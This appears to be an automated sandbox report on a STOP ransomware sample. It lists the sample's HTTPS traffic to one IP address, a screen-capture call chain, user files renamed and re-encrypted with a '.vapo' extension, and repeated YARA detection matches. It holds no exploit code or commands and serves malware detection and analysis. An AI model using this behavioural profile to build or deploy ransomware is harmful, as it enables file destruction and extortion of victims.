https://we.tl/t-tnzomMj6KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_004F22E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,0_2_004F22E0
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crlJump to dropped file

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: Yara matchFile source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7148, type: MEMORYSTR
                Source: Yara matchFile source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: SAMPLE
                Source: Yara matchFile source: 3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.1691195680.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7148, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6252, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6684, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: DROPPED
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile moved: C:\Users\user\Desktop\NWTVCDUMOB.mp3Jump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile deleted: C:\Users\user\Desktop\NWTVCDUMOB.mp3Jump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile moved: C:\Users\user\Desktop\DVWHKMNFNN\IPKGELNTQY.mp3Jump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile deleted: C:\Users\user\Desktop\DVWHKMNFNN\IPKGELNTQY.mp3Jump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile moved: C:\Users\user\Desktop\NWTVCDUMOB.pdfJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log entropy: 7.99381460329Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.jfm entropy: 7.9901223659Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99530298897Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99601269757Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99252942164Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99746832261Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.9964620667Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99087792106Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.9983111011Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.99836865416Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99836537098Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99839115882Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99831623072Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99859178324Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99876541211Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133507029727626976.txt entropy: 7.99841826973Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945576432631.txt entropy: 7.99835209347Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99843243455Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99727267213Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99855046906Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99734387242Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99353038114Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99859215154Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99318745073Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99785705452Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4 entropy: 7.99838605744Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct150C.tmp.vapo (copy) entropy: 7.99708809205Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct33D7.tmp.vapo (copy) entropy: 7.99758803949Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct38F0.tmp.vapo (copy) entropy: 7.99774487413Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct443C.tmp.vapo (copy) entropy: 7.99726849773Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct49A7.tmp.vapo (copy) entropy: 7.99680609175Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctAB5F.tmp.vapo (copy) entropy: 7.99756193181Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctDB2E.tmp.vapo (copy) entropy: 7.99753673478Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctE4A4.tmp.vapo (copy) entropy: 7.99740380621Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctEA40.tmp.vapo (copy) entropy: 7.99800616406Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctF411.tmp.vapo (copy) entropy: 7.99759240613Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.vapo (copy) entropy: 7.99252942164Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.vapo (copy) entropy: 7.99746832261Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.vapo (copy) entropy: 7.9964620667Jump to dropped file
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.vapo (copy) entropy: 7.99087792106Jump to dropped file

                System Summary

                barindex
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: SAMPLEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: SAMPLEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 4.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 4.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 2.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 5.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000004.00000002.1787079865.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000000.1675439024.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000003.1687478717.00000000031A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000002.00000000.1691195680.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000000.1675353698.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000004.00000000.1774988974.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000002.00000000.1691104107.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000000.1702670598.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000005.00000002.1868867088.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000005.00000000.1855772078.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000004.00000002.1787026670.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000004.00000000.1774903809.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000005.00000002.1868782664.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000005.00000000.1855703010.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7020, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6376, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7148, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6252, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6684, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: DROPPEDMatched rule: Detects STOP ransomware Author: ditekSHen
